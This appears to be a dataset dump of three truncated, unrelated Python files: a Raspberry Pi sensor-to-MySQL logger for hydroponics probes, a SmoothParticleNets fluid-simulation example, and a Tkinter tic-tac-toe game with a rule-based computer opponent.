input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
<reponame>dombold/MyHydropi-Blog<filename>Website_Code/Sensors/Hydropi_Sensors_Only.py<gh_stars>0
#!/usr/bin/env python
##############################################################################
#
# Written by <NAME> for the Raspberry Pi - 2016
#
# Website: myhydropi.com
# Contact: <EMAIL>
#
# Feel free to use and modify this code for you own use in any way.
#
# This program is designed to provide the following features and should be run
# initially from the command line so that a couple of configuration errors can
# be tested for and warnings provided on screen:
#
# 1. Read Multiple Sensors - DS18B20 1-wire type Temperature sensors, Atlas
# Scientific Temperature, pH, Oxidation Reduction Potential (ORP) and
# Electrical Conductivity sensors and save the results to a MySQL database at
# a set interval with a set level of accuracy. Multiple sensors of the same
# type can also be used by configuring the "sensors" variable with the correct
# sensor type. A reference temperature reading will be set by one of the
# temperature sensors if any are connected, if not a value of 25C will be
# applied. This is necessary to ensure accurate readings from the other
# sensors as the liquid being tested changes temperature.
# The electrical conductivity reading is also converted to parts per million.
# There is also a customizible "pause" setting included to stop readings while
# chemicals are being added, this prevents spikes in the readings for more
# accurate results.
#
# 2. The program will also create the initial database and tables if they do
# not already exist in MySQL.
#
# For Python 3 I have used python-mysqldb module to connect to the database.
# to add the module you need to enter the following commands
#
# sudo apt install python-mysqldb
#
##############################################################################
import io
import os
import sys
import fcntl
import mysql.connector as mariadb
from time import sleep
from collections import OrderedDict
# Uncomment sleep if running program at startup with crontab
#sleep(10)
# Load Raspberry Pi Drivers for 1-Wire Temperature Sensor
os.system('modprobe w1-gpio')
os.system('modprobe w1-therm')
# Define Atlas Scientific Sensor Class
class atlas_i2c:
long_timeout = 1.5 # the timeout needed to query readings & calibrations
short_timeout = .5 # timeout for regular commands
default_bus = 1 # the default bus for I2C on the newer Raspberry Pis,
# certain older boards use bus 0
default_address = 102 # the default address for the Temperature sensor
def __init__(self, address=default_address, bus=default_bus):
# open two file streams, one for reading and one for writing
# the specific I2C channel is selected with the bus
# it is usually 1, except for older revisions where its 0
# wb and rb indicate binary read and write
self.file_read = io.open("/dev/i2c-" + str(bus), "rb", buffering=0)
self.file_write = io.open("/dev/i2c-" + str(bus), "wb", buffering=0)
# initializes I2C to either a user specified or default address
self.set_i2c_address(address)
def set_i2c_address(self, addr):
# set the I2C communications to the slave specified by the address
# The commands for I2C dev using the ioctl functions are specified in
# the i2c-dev.h file from i2c-tools
I2C_SLAVE = 0x703
fcntl.ioctl(self.file_read, I2C_SLAVE, addr)
fcntl.ioctl(self.file_write, I2C_SLAVE, addr)
def write(self, string):
# appends the null character and sends the string over I2C
string += "\00"
self.file_write.write(bytes(string, 'UTF-8'))
def read(self, num_of_bytes=31):
# reads a specified number of bytes from I2C,
# then parses and displays the result
res = self.file_read.read(num_of_bytes) # read from the board
# remove the null characters to get the response
response = list([x for x in res])
if(response[0] == 1): # if the response isnt an error
# change MSB to 0 for all received characters except the first
# and get a list of characters
char_list = [chr(x & ~0x80) for x in list(response[1:])]
# NOTE: having to change the MSB to 0 is a glitch in the
# raspberry pi, and you shouldn't have to do this!
# convert the char list to a string and returns it
result = ''.join(char_list)
return result.split('\x00')[0]
else:
return "Error " + str(ord(response[0]))
def query(self, string):
# write a command to the board, wait the correct timeout,
# and read the response
self.write(string)
# the read and calibration commands require a longer timeout
if((string.upper().startswith("R")) or
(string.upper().startswith("CAL"))):
sleep(self.long_timeout)
elif((string.upper().startswith("SLEEP"))):
return "sleep mode"
else:
sleep(self.short_timeout)
return self.read()
def close(self):
self.file_read.close()
self.file_write.close()
# Check that only one Primary Temperature sensor is defined
def check_for_only_one_reference_temperature():
ref_check = 0
for key, value in list(sensors.items()):
if (value["is_connected"]) is True:
if value["sensor_type"] == "1_wire_temp":
if value["is_ref"] is True:
ref_check += 1
if value["sensor_type"] == "atlas_temp":
if value["is_ref"] is True:
ref_check += 1
if ref_check > 1:
os.system('clear')
print ("\n\n !!!! WARNING !!!!\n\n"
"You can only have one Primary Temperature sensor, Please set the\n"
"Temperature sensor that is in the liquid you are testing to True\n"
"and the other to False\n\n !!!! WARNING !!!!\n\n")
sys.exit() # Stop program
return
# Create required database in the MySQL if it doesn't' already exist
def create_database():
conn = mariadb.connect(user=username,
password=password,
host=servername)
curs = conn.cursor()
try:
curs.execute("SET sql_notes = 0; ") # Hide Warnings
curs.execute("CREATE DATABASE IF NOT EXISTS {}".format(dbname))
curs.execute("SET sql_notes = 1; ") # Show Warnings
except mariadb.Error as error:
print("Error: {}".format(error))
pass
conn.commit()
conn.close()
return
def open_database_connection():
conn = mariadb.connect(user=username,
password=password,
host=servername,
database=dbname)
curs = conn.cursor()
try:
curs.execute("SET sql_notes = 0; ") # Hide Warnings
except mariadb.Error as error:
print("Error: {}".format(error))
pass
return conn, curs
def close_database_connection(conn, curs):
try:
curs.execute("SET sql_notes = 1; ") # Show Warnings
except mariadb.Error as error:
print("Error: {}".format(error))
pass
conn.commit()
conn.close()
def create_sensors_table():
conn, curs = open_database_connection()
try:
curs.execute("CREATE TABLE IF NOT EXISTS sensors (timestamp DATETIME);")
except mariadb.Error as error:
print("Error: {}".format(error))
pass
for key, value in list(sensors.items()):
if value["is_connected"] is True:
try:
curs.execute("ALTER TABLE sensors ADD {} DECIMAL(10,2);"
.format(value["name"]))
except mariadb.Error as error:
print("Error: {}".format(error))
pass
close_database_connection(conn, curs)
return
def remove_unused_sensors():
conn, curs = open_database_connection()
for key, value in list(sensors.items()):
if value["is_connected"] is False:
try:
curs.execute("ALTER TABLE sensors DROP {};"
.format(value["name"]))
except mariadb.Error as error:
print("Error: {}".format(error))
pass
close_database_connection(conn, curs)
return
# Read in the data from the Temp Sensor file
def read_1_wire_temp_raw(temp_num):
f = open(sensors[temp_num]["ds18b20_file"], 'r')
lines = f.readlines()
f.close()
return lines
# Process the Temp Sensor file for errors and convert to degrees C
def read_1_wire_temp(temp_num):
lines = read_1_wire_temp_raw(temp_num)
while lines[0].strip()[-3:] != 'YES':
sleep(0.2)
lines = read_1_wire_temp_raw(temp_num)
equals_pos = lines[1].find('t=')
if equals_pos != -1:
temp_string = lines[1][equals_pos + 2:]
# Use line below for Celsius
temp_curr = float(temp_string) / 1000.0
#Uncomment line below for Fahrenheit
#temp_curr = ((float(temp_string) / 1000.0) * (9.0 / 5.0)) + 32
return temp_curr
# read and log each sensor if it is set to True in the sensors list
def log_sensor_readings(all_curr_readings):
# Create a timestamp and store all readings on the MySQL database
conn, curs = open_database_connection()
try:
curs.execute("INSERT INTO sensors (timestamp) VALUES(now());")
curs.execute("SELECT MAX(timestamp) FROM sensors")
except mariadb.Error as error:
print("Error: {}".format(error))
pass
last_timestamp = curs.fetchone()
last_timestamp = last_timestamp[0].strftime('%Y-%m-%d %H:%M:%S')
for readings in all_curr_readings:
try:
curs.execute(("UPDATE sensors SET {} = {} WHERE timestamp = '{}'")
.format(readings[0], readings[1], last_timestamp))
except mariadb.Error as error:
print("Error: {}".format(error))
pass
close_database_connection(conn, curs)
return
def read_sensors():
all_curr_readings = []
ref_temp = 25
# Get the readings from any 1-Wire temperature sensors
for key, value in sensors.items():
if value["is_connected"] is True:
if value["sensor_type"] == "1_wire_temp":
try:
sensor_reading = (round(float(read_1_wire_temp(key)),
value["accuracy"]))
except:
sensor_reading = 50
all_curr_readings.append([value["name"], sensor_reading])
if value["is_ref"] is True:
ref_temp = sensor_reading
# Get the readings from any Atlas Scientific temperature sensors
if value["sensor_type"] == "atlas_scientific_temp":
device = atlas_i2c(value["i2c"])
try:
sensor_reading = round(float(device.query("R")),
value["accuracy"])
except:
sensor_reading = 50
all_curr_readings.append([value["name"], sensor_reading])
if value["is_ref"] is True:
ref_temp = sensor_reading
# Get the readings from any Atlas Scientific Elec Conductivity sensors
if value["sensor_type"] == "atlas_scientific_ec":
device = atlas_i2c(value["i2c"])
# Set reference temperature value on the sensor
device.query("T," + str(ref_temp))
try:
sensor_reading = (round(((float(device.query("R"))) *
value["ppm_multiplier"]), value["accuracy"]))
except:
sensor_reading = 10000
all_curr_readings.append([value["name"], sensor_reading])
# Get the readings from any other Atlas Scientific sensors
if value["sensor_type"] == "atlas_scientific":
device = atlas_i2c(value["i2c"])
# Set reference temperature value on the sensor
device.query("T," + str(ref_temp))
try:
sensor_reading = round(float(device.query("R")),
value["accuracy"])
except:
if value["name"] == "ph":
sensor_reading = 2
elif value["name"] == "orp":
sensor_reading = 1000
all_curr_readings.append([value["name"], sensor_reading])
log_sensor_readings(all_curr_readings)
return
# Configuration Settings
# Define the sensor names, what sensors | |
<filename>examples/fluid_sim.py<gh_stars>0
"""
An example of a fluid simulation built using this library. The FluidSim class below implements
Position Based Fluids. The main function sets up and runs the simulation. Unfortunately this
library does not come with any visualization tools, so it only prints the average position of
the particles. However it should be easy to hook up to an outside viewer if so desired.
This file takes no command line arguments, so you can just run it as is.
"""
import numpy as np
import SmoothParticleNets as spn
import torch
from torch.autograd import Variable
import torch.nn as nn
import pdb
NSUBSTEPS = 1
DT = 1.0/60
STIFFNESS = 2.99e-11
DENSITY_REST = 17510.1
GRAVITY = [0, -9.8, 0]
MAX_VEL = 0.5*0.1*NSUBSTEPS/DT
COHESION = 0.1
VISCOSITY = 60.0
SURFACE_TENSION = 0.0
SURFACE_CONSTRAINT_SCALE = 168628.0
MAX_ACC = 0.833
NUM_ITERATIONS = 3
RELAXATION = 1.0
DAMP = 1.0
COLLISION_DISTANCE = 0.00125
NUM_STATIC_ITERATIONS = 1
NUM_FIX_ITERATIONS = NUM_STATIC_ITERATIONS
FLUID_REST_DISTANCE = 0.55
# A helper class to create a set of ConvSDF layers with different sized kernels for
# computing numerical gradients.
class GradConvSDF(nn.Module):
def __init__(self, sdfs, sdf_sizes, ndim, max_distance):
super(GradConvSDF, self).__init__()
self.ndim = ndim
self.convsdfgrad = []
for d in range(ndim):
ks = [1]*ndim
ks[d] = 3
kernel_size = ks
dilation = 0.0005
convsdf = spn.ConvSDF(sdfs, sdf_sizes, 1, ndim, kernel_size=ks, dilation=dilation,
max_distance=max_distance, with_params=False, compute_pose_grads=True)
convsdf.weight.data.fill_(0)
convsdf.weight.data[0, 0] = -1/(2*dilation)
convsdf.weight.data[0, 2] = 1/(2*dilation)
convsdf.bias.data.fill_(0)
self.convsdfgrad.append(convsdf)
exec("self.convsdfgrad%d = convsdf" % d)
def forward(self, locs, idxs, poses, scales):
return torch.cat([self.convsdfgrad[d](locs, idxs, poses, scales)
for d in range(self.ndim)], 2)
class FluidSim(nn.Module):
def __init__(self, sdfs, sdf_sizes, radius, ndim, with_params=[], init_params={}):
"""
Initializes a fluid simulation model.
Arguments:
sdfs: A list of SDFs for all objects in the simulation. This argument is passed directly as the sdfs
argument of ConvSDF. Refer to the documentation of that layer for details.
sdf_sizes: A list of the sizes for the sdfs argument. This argument is also passed directy to ConvSDF.
Refer to the documentation for that layer for details.
radius: The particle interaction radius. Particles that are further than this apart do not
interact. Larger values for this parameter slow the simulation significantly.
ndim: The dimensionality of the coordinate space in the simulation. Only 2 or 3 is supported, and only
3 has been tested.
with_params: (optional) List of parameter names. These will be the trainabale parameters in this
module. See below for a list of parameters. Only parameters labelled as trainable may
appear in this list.
init_params: A dictionary mapping parameter names to values to initialize them with. See below for a
list of parameters. If a parameter does not appear in this list, it is initialized with
its default value. Default values are listed at the top of the file.
Parameters:
nSubsteps: Each call to forward will divide the simulation time by this value and run it this many
times. Useful when it is desired to call the sim multiple times per timestep.
dt: The amount of time that elapses during one forward call. This is used to scale the various
simulation parameters.
stiffness: A parameter controlling how the pressure offset is computed. It is not recommended to
change this from the default.
maxSpeed: The maximum magnitude of the particle velocities. Higher velocities are clamped.
cohesion[trainable]: The cohesion constant.
viscosity[trainable]: The viscosity constant.
surfaceTension[trainable]: The surface tension constant.
numIterations: The number of constraint solver iterations to do per simulation step.
relaxationFactor: The value to divide the constraint solution deltas by to "relax" the solver.
damp: The factor to dampen the constraint solution deltas by.
collisionDistance: When a particle is closer than this to an object, it is considered colliding.
numStaticIterations: When moving particles or objects, this is the number of substeps that
movement is split into to check for collisions. The higher this value, the
less likely it is that particles will clip through objects but the slower
the simulation is.
fluidRestDistance: The distancce fluid particles should be from each other at rest, expressed
as a ratio of the radius.
"""
super(FluidSim, self).__init__()
self.all_params = {
"nSubsteps": NSUBSTEPS,
"dt": DT,
"stiffness": STIFFNESS,
"density_rest": DENSITY_REST,
"maxSpeed": MAX_VEL,
"cohesion": COHESION,
"viscosity": VISCOSITY,
"surfaceTension": SURFACE_TENSION,
"surfaceConstraintScale": SURFACE_CONSTRAINT_SCALE,
"maxAcceleration": MAX_ACC,
"numIterations": NUM_ITERATIONS,
"relaxationFactor": RELAXATION,
"damp": DAMP,
"collisionDistance": COLLISION_DISTANCE,
"numStaticIterations": NUM_STATIC_ITERATIONS,
"numFixIterations": NUM_FIX_ITERATIONS,
"fluidRestDistance": FLUID_REST_DISTANCE*radius,
}
self.radius = radius
self.ndim = ndim
self._calculate_rest_density(init_params["fluidRestDistance"]
if "fluidRestDistance" in init_params else self.all_params["fluidRestDistance"])
max_distance = max([sdf.max().item()
for sdf in sdfs]) if len(sdfs) else 1e5
if not len(sdfs):
sdfs = [torch.from_numpy(
np.zeros([1]*self.ndim, dtype=np.float32)), ]
sdf_sizes = [1, ]
self.coll = spn.ParticleCollision(
ndim, radius, max_collisions=128, include_self=False)
self.reorder_un2sort = spn.ReorderData(reverse=False)
self.reorder_sort2un = spn.ReorderData(reverse=True)
self.convsdfgrad = GradConvSDF(
sdfs, sdf_sizes, ndim, max_distance=max_distance)
self.convsdfcol = spn.ConvSDF(sdfs, sdf_sizes, 1, ndim, 1, 1,
max_distance=max_distance, with_params=False, compute_pose_grads=True)
self.convsdfcol.weight.data.fill_(-1)
self.convsdfcol.bias.data.fill_(0)
self.relu = nn.ReLU()
layer_types = [
('dspiky', 1, True),
('dspiky', ndim, True),
('constant', 1, False),
('constant', ndim, False),
('spiky', 1, False),
('spiky', ndim, False),
('cohesion', 1, True),
('cohesion', ndim, True),
]
for kernel, dim, normed in layer_types:
conv = spn.ConvSP(dim, dim, ndim, kernel_size=1, dilation=1, radius=radius,
dis_norm=normed, with_params=False, kernel_fn=kernel)
conv.bias.data.fill_(0)
conv.weight.data.fill_(0)
for i in range(dim):
conv.weight.data[i, i, 0] = 1
exec("self.%s%s%s = conv" % (kernel, "D" if dim == ndim else str(dim),
"normd" if normed else ""))
self.register_buffer("ones", Variable(torch.zeros(1)))
self.register_buffer("gravity", Variable(torch.from_numpy(
np.array(init_params["gravity"] if "gravity" in init_params else GRAVITY,
dtype=np.float32).reshape((1, 1, -1))), requires_grad=False))
self.unroll = 0
self.param_dict = {}
for p, init_val in self.all_params.items():
if init_params is not None and p in init_params:
init_val = init_params[p]
self.__setattr__("_"+p, init_val)
if p in with_params:
v = 1.0
self.register_parameter(p, torch.nn.Parameter(torch.from_numpy(
np.array([v], dtype=np.float32))))
def _calculate_rest_density(self, fluidRestDistance):
points = np.array(self._tight_pack3D(
self.radius, fluidRestDistance, 2048))
d = np.sqrt(np.sum(points**2, axis=1))
rho = 0
rhoderiv = 0
for dd in d:
rho += spn.KERNEL_FN["spiky"](dd, self.radius)
rhoderiv += spn.KERNEL_FN["dspiky"](dd, self.radius)**2
self.all_params["density_rest"] = float(rho)
self.all_params["stiffness"] = float(1.0/rhoderiv)
# Generates an optimally dense sphere packing at the origin (implicit sphere at the origin)
def _tight_pack3D(self, radius, separation, maxPoints):
dim = int(np.ceil(1.0*radius/separation))
points = []
for z in range(-dim, dim+1):
for y in range(-dim, dim+1):
for x in range(-dim, dim+1):
xpos = x*separation + \
(separation*0.5 if ((y+z) & 1) else 0.0)
ypos = y*np.sqrt(0.75)*separation
zpos = z*np.sqrt(0.75)*separation
# skip center
if xpos**2 + ypos**2 + zpos**2 == 0.0:
continue
if len(points) < maxPoints and np.sqrt(xpos**2 + ypos**2 + zpos**2) <= radius:
points.append([xpos, ypos, zpos])
return points
def SetSDFs(self, sdfs, sdf_sizes):
if not len(sdfs):
sdfs = [torch.from_numpy(
np.zeros([1]*self.ndim, dtype=np.float32)), ]
sdf_sizes = [1, ]
self.convsdfcol.SetSDFs(sdfs, sdf_sizes)
for i in range(self.ndim):
layer = getattr(self.convsdfgrad, "convsdfgrad%d" % i)
layer.SetSDFs(sdfs, sdf_sizes)
def _cap_magnitude(self, A, cap):
d = len(A.size())
vv = torch.norm(A, 2, d-1, keepdim=True)
vv = cap/(vv + 0.0001)
vv = -(self.relu(-vv + 1.0) - 1.0)
return A*vv
def _interp_poses(self, last_poses, poses, t):
lq = last_poses[:, :, -4:]
pq = poses[:, :, -4:]
lt = last_poses[:, :, :-4]
pt = poses[:, :, :-4]
# Compute the quaternion dot product.
dot = torch.sum(lq*pq, 2, keepdim=True).data
dot[dot < 0] = -1
dot[dot >= 0] = 1
dot = Variable(dot, requires_grad=False)
# Multiply negative dot product quaternions by -1.
q = pq*dot
# Linearly interpolate.
rt = (pt - lt)*t + lt
rq = (pq - lq)*t + lq
q = rq/torch.sqrt(torch.sum(rq**2, 2, keepdim=True))
ret = torch.cat((rt, rq), 2)
return ret
def _fix_static_collisions(self, locs, idxs, poses, scales, collisionDistance):
ret = locs
mtd = self.convsdfcol(ret, idxs, poses, scales) + collisionDistance
intersect = self.relu(
mtd) + self.relu(-self.relu(-(mtd - 0.5)) + 0.5)*0.0
sdfgrad = self.convsdfgrad(ret, idxs, poses, scales)
sdfgrad = torch.nn.functional.normalize(sdfgrad, dim=2, eps=1e-5)
ret = ret + intersect*sdfgrad
return ret
def fixStaticCollisions(self, locs, new_locs, idxs, poses, scales):
for p in self.all_params:
if hasattr(self, p):
scale = getattr(self, p)
else:
scale = 1
#globals()[p] = getattr(self, "_"+p)*scale
val = getattr(self, "_"+p)*scale
exec("%s = val" % p)
delta = (new_locs - locs)/numStaticIterations
for _ in range(numStaticIterations):
locs = locs + delta
locs = self._fix_static_collisions(locs, idxs, poses,
scales, collisionDistance)
return locs
def forward(self, locs, vel, idxs, poses, last_poses, scales, extra_constraints=None):
"""
Compute one forward timestep of the fluid simulation. It takes as input the current
fluid state (locs, vel) as well as the state of rigid objects | |
<reponame>Saadmairaj/TKtictac<filename>__main__.py<gh_stars>1-10
## DISCLAIMER: This was my first ever game after learning the basic of python so the current .py file is not optimized
__version__ = '0.0.2'
import platform
import random as rnd
from tkinter import *
from tkinter import ttk
from tkinter.font import Font
from tkinter.messagebox import *
from pygame.mixer import init, music
from Tk_Loop import GuiLoop
from Titlebar import TitleBar
from TkExtra import Canvas, grid
import tkinter.font as font
import tkmacosx as tkm
# Common button options
button_options = dict(
borderless=1,
takefocus=0,
activebackground=('white', 'black'),
overbackground='#3d4246',
font=('Avenir'),
)
class FrameBody(Tk):
def __init__(self, *args, **kwargs):
Tk.__init__(self)
self.option_add("*Font", ('Avenir'))
self.py = init()
self.tb = TitleBar(self, "TicTacToe", False) # if enabled use self.geometry("500x325+300+200")
self.tb.icon('./assets/icon.icns')
self.tb.dark_mode()
self.Load = music.load('dummy.mp3')
self.Move = True
self.off = True
self.Restarting = True
self._Turn = 'h'
self.Round = 1
self.BgBlack = "black"
self.BgWhite = "white"
self.difficulty = "unbeatable"
self.PlScr = 0
self.CpScr = 0
self.Effect = True
self.EffectCount=0
self.EffectCurrent = None
self.EffectLoop=0
self.configure(highlightbackground=self.BgWhite,highlightcolor=self.BgWhite,highlightthickness=3)
self.title('TicTacToe')
self.resizable(False,False)
self.geometry("500x325+300+200")
self.configure(bg=self.BgBlack)
self.options = Frame(self, bg=self.BgBlack, width=150)
self.options.config(highlightbackground=self.BgWhite,highlightcolor=self.BgWhite,highlightthickness=1)
self.options.grid_propagate(1)
self.options.pack(side=LEFT, fill=Y)
self._Grid(root=self.options, row=15, col=3)
self.Score=Label(self.options, text='Score', fg=self.BgWhite, bg=self.BgBlack)
self.Score.config(font=Font(size=35, underline=True, family='Savoye LET', slant='italic'))
self.Score.grid(row=0, columnspan=4, padx=10)
self.Player=Label(self.options, text="Player",fg=self.BgWhite, bg=self.BgBlack)
self.Player.grid(row=1, column=0, padx=10, sticky=SW)
self.Computer=Label(self.options, text="Computer",fg=self.BgWhite, bg=self.BgBlack)
self.Computer.grid(row=1, column=3, padx=10, sticky=SE)
self.PlayerScore=Label(self.options, text='0',fg=self.BgWhite, bg=self.BgBlack)
self.PlayerScore.grid(row=2, column=0, padx=20, sticky=NSEW)
self.ComputerScore=Label(self.options, text='0',fg=self.BgWhite, bg=self.BgBlack)
self.ComputerScore.grid(row=2, column=3, padx=20, sticky=NSEW)
self.DiffLB1 = Label(self.options,fg=self.BgWhite, bg=self.BgBlack)
self.DiffLB1.config(text="Difficulty:")
self.DiffLB1.grid(row=9, columnspan=4,padx=10,sticky=S)
self.DiffLB2 = Label(self.options,fg=self.BgWhite, bg=self.BgBlack)
self.DiffLB2.config(text=self.difficulty.capitalize())
self.DiffLB2.config(font=Font(weight="bold"))
self.DiffLB2.grid(row=10,columnspan=4,padx=10,sticky=N)
self.RoundLB=Label(self.options, text=("Round: {}".format(self.Round)),fg=self.BgWhite, bg=self.BgBlack)
self.RoundLB.grid(row=5,columnspan=4,padx=10)
self._Data = {0:None, 1:None, 2:None, 3:None, 4:None, 5:None, 6:None, 7:None, 8:None}
self.Draw = _drawings(self,background=self.BgBlack)
self.Draw.pack(side=LEFT)
self.Ai=Bot(self, difficulty=self.difficulty)
self.Setting = Settings(self)
self.bind("<Button-1>", self.Turn)
self.AniLoop = GuiLoop(self, self.RandomHexCode, speed=100)
self.Win_ChkLoop = GuiLoop(self, self.win_check, speed=100)
def Sound_Effect(self, state=True):
if state and self.off:
music.play()
else: return
def RandomHexCode(self, whatever=None):
r = lambda: rnd.randint(0,255)
color = ('#%02X%02X%02X' % (r(),r(),r()))
self.Score.configure(fg=color)
self.Setting.headinglb['fg'] = color
for i in (1,2,3,4): self.Draw.itemconfig(i,fill=color)
self.config(highlightcolor=color)
def _Grid(self, root, row, col):
for y in range(col):
Grid.columnconfigure(root, y, weight=1)
for x in range(row):
Grid.rowconfigure(root, x, weight=1)
def Turn(self, evt=None):
if self.Restarting:
if self.Draw.Human(evt=evt):
self.after(615, lambda: self.Ai.Move())
def Effects(self):
Stop = False
self.Move = False
if self.EffectCount <= 5:
if self.Effect:
self.Draw.itemconfig(self.EffectCurrent,state='hidden')
self.Effect=False
else:
self.Draw.itemconfig(self.EffectCurrent,state='normal')
self.Effect=True
self.EffectCount+=1
else:
self.EffectCount = 0
self.after_cancel(self.EffectLoop)
self.Move=True
Stop = True
if not Stop: self.EffectLoop=self.after(100,self.Effects)
def win_check(self):
for i in self.Ai._Combo:
if self._Data[i[0]]=='X' and self._Data[i[1]]=='X' and self._Data[i[2]]=='X':
self.CpScr+=1
self.ComputerScore.configure(text=str(self.CpScr))
for x,y in self.Draw._LineDic.items():
if i == y: self.Draw.itemconfig(x,state='normal')
self.Move=False
self.Restarting = False
self.Win_ChkLoop.Pause()
self.Restart(win=True)
return True
if self._Data[i[0]]=='O' and self._Data[i[1]]=='O' and self._Data[i[2]]=='O':
self.PlScr+=1
self.PlayerScore.configure(text=str(self.PlScr))
for x,y in self.Draw._LineDic.items():
if i == y: self.Draw.itemconfig(x, state='normal')
self.Move=False
self.Restarting = False
self.Win_ChkLoop.Pause()
self.Restart(win=True)
return True
if None not in self._Data.values():
self.Win_ChkLoop.Pause()
self.Restart()
return False
def Restart(self, win = False):
def Reset():
self.Round+=1
self.RoundLB.configure(text=("Round: {}".format(self.Round)))
self.Move=True
self.Effect = True
self.Restarting = True
self.EffectCount=0
self.EffectCurrent = None
self.EffectLoop=0
self._Data = {0:None, 1:None, 2:None, 3:None, 4:None, 5:None, 6:None, 7:None, 8:None}
self.Draw.destroy()
del self.Ai
# self.update()
self.Draw = _drawings(self,background=self.BgBlack,
highlightbackground=self.BgWhite,highlightcolor=self.BgWhite)
self.Draw.pack(side=LEFT)
self.Ai=Bot(self, difficulty=self.difficulty)
self.DiffLB2.config(text=self.difficulty.capitalize())
self.Win_ChkLoop.Play()
if None not in self._Data.values(): self.after(1500, Reset)
if win: self.after(1500, Reset)
class _drawings(Canvas):
def __init__(self, master, *args, **kwargs):
Canvas.__init__(self, master, kwargs)
self.master = master
self.configure(highlightthickness=1)
self.config(width=350, height=300)
self.start = None
# Lines
self.create_line(125, 40, 125, 260, fill= self.master.BgWhite, width=4)
self.create_line(215, 40, 215, 260, fill= self.master.BgWhite, width=4)
self.create_line(50, 105, 290, 105, fill= self.master.BgWhite, width=4)
self.create_line(50, 185, 290, 185, fill= self.master.BgWhite, width=4)
self.L012=self.create_line(70, 70, 270, 70, fill= self.master.BgWhite, width=4, state='hidden')
self.L345=self.create_line(70, 145, 270, 145, fill= self.master.BgWhite, width=4, state='hidden')
self.L678=self.create_line(70, 220, 270, 220, fill= self.master.BgWhite, width=4, state='hidden')
self.L147=self.create_line(170, 60, 170, 240, fill= self.master.BgWhite, width=4, state='hidden')
self.L036=self.create_line( 85, 60, 85, 240, fill= self.master.BgWhite, width=4, state='hidden')
self.L258=self.create_line(255, 60, 255, 240, fill= self.master.BgWhite, width=4, state='hidden')
self.L048=self.create_line( 80, 60, 260, 230, fill= self.master.BgWhite, width=4, state='hidden')
self.L246=self.create_line(260, 60, 80, 230, fill= self.master.BgWhite, width=4, state='hidden')
self._LineDic={
self.L012 : [0,1,2],
self.L345 : [3,4,5],
self.L678 : [6,7,8],
self.L147 : [1,4,7],
self.L036 : [0,3,6],
self.L258 : [2,5,8],
self.L048 : [0,4,8],
self.L246 : [2,4,6],
}
def Click(self, x, y):
if x<120 and y<100 and x> 50 and y> 40: return 50+8, 40-8, 0
if x<210 and y<100 and x>130 and y> 40: return 135+8, 40-8, 1
if x<290 and y<100 and x>220 and y> 40: return 220+8, 40-8, 2
if x<120 and y<190 and x> 50 and y>120: return 50+8, 115-8, 3
if x<210 and y<190 and x>130 and y>120: return 135+8, 115-8, 4
if x<290 and y<190 and x>220 and y>120: return 220+8, 115-8, 5
if x<120 and y<260 and x> 50 and y>192: return 50+8, 192-8, 6
if x<210 and y<260 and x>130 and y>192: return 135+8, 192-8, 7
if x<290 and y<260 and x>220 and y>192: return 220+8, 192-8, 8
return False
def Human(self, evt=None):
if self.Click(evt.x, evt.y) and self.master.Move:
x,y,p=self.Click(evt.x, evt.y)
if self.master._Data[p] == None:
L = self.create_text(x,y,text="◯",font=Font(size=60),fill= self.master.BgWhite,anchor=NW)
self.master.Sound_Effect()
self.master.EffectCurrent=L
self.master.Effects()
self.master._Data.update({p:"O"})
return True
class Bot(object):
def __init__(self, master, difficulty=None, *args, **kwargs):
self.master = master
self.Goonce = True
self._Data = master._Data
self.Draw = master.Draw
self.diff = difficulty
self._TryBlock = { (1,6) : 0,
(1,8) : 2,
(7,2) : 8,
(7,0) : 6,
(3,8) : 6,
(3,2) : 0,
(5,0) : 2,
(5,6) : 8 }
self._TryBlock2 = { (5,7) : 0,
(1,5) : 6,
(1,3) : 8,
(3,7) : 2 }
self._AlreadyMoved=False
self._Combo = ( [0, 1, 2],[0, 3, 6],[0, 4, 8],
[1, 4, 7],[2, 5, 8],[2, 4, 6],
[3, 4, 5],[6, 7, 8] )
self._Poisiton = ( ( 50+11, 40-2, 0),
(135+11, 40-2, 1),
(220+11, 40-2, 2),
( 50+11, 115-2, 3),
(135+11, 115-2, 4),
(220+11, 115-2, 5),
( 50+11, 192-2, 6),
(135+11, 192-2, 7),
(220+11, 192-2, 8) )
self._Cornors = (0, 6, 8, 2)
self._Sides = (1, 3, 5, 7)
self._Move = 0
def Move(self):
if None in self._Data.values() and self.master.Move and self.master.Restarting:
self.master.Sound_Effect()
if self.diff=="unbeatable" or self.diff=='hard':
if self.Smart_Move():
self._AlreadyMoved = True
return True
if self.diff=="unbeatable":
if self.Block2():
self._AlreadyMoved = True
return True
if self.diff=="unbeatable" or self.diff=="medium" or self.diff=="hard" or self.diff=="easy":
if self.Aggressive_Move():
self._AlreadyMoved = True
return True
if self.diff=="unbeatable" or self.diff=="medium" or self.diff=="hard":
if self.Defensive_Move():
self._AlreadyMoved = True
return True
if self.diff=="unbeatable" or self.diff=="hard" or self.diff=="medium":
if self.Block():
self._AlreadyMoved = True
return True
if self.diff=="unbeatable" or self.diff=="medium" or self.diff=="hard" or self.diff=="easy":
if self.Just_Move():
self._AlreadyMoved = True
return True
else: return False
def Smart_Move(self):
if self._Data[4] == None :
x,y,p = self._Poisiton[4]
L = self.Draw.create_text(x,y,text="╳",font=Font(size=50),fill= self.master.BgWhite,anchor=NW)
self.master.EffectCurrent=L
self.master.Effects()
self._Data.update({4:"X"})
return True
return False
def Aggressive_Move(self):
for x in self._Combo:
if self._Data[x[0]] == "X" and self._Data[x[1]] == "X" and self._Data[x[2]] == None:
X,Y,p = self._Poisiton[x[2]]
L = self.Draw.create_text(X,Y,text="╳",font=Font(size=50),fill= self.master.BgWhite,anchor=NW)
self.master.EffectCurrent=L
self.master.Effects()
self._Data.update({p:"X"})
return True
elif self._Data[x[1]] == "X" and self._Data[x[2]] == "X" and self._Data[x[0]] == None:
X,Y,p = self._Poisiton[x[0]]
L = self.Draw.create_text(X,Y,text="╳",font=Font(size=50),fill= self.master.BgWhite,anchor=NW)
self.master.EffectCurrent=L
self.master.Effects()
self._Data.update({p:"X"})
return True
elif self._Data[x[2]] == "X" and self._Data[x[0]] == "X" and self._Data[x[1]] == None:
X,Y,p = self._Poisiton[x[1]]
L = self.Draw.create_text(X,Y,text="╳",font=Font(size=50),fill= self.master.BgWhite,anchor=NW)
self.master.EffectCurrent=L
self.master.Effects()
self._Data.update({p:"X"})
return True
def Defensive_Move(self):
for x in self._Combo:
if self._Data[x[0]] == "O" and self._Data[x[1]] == "O" and self._Data[x[2]] == None:
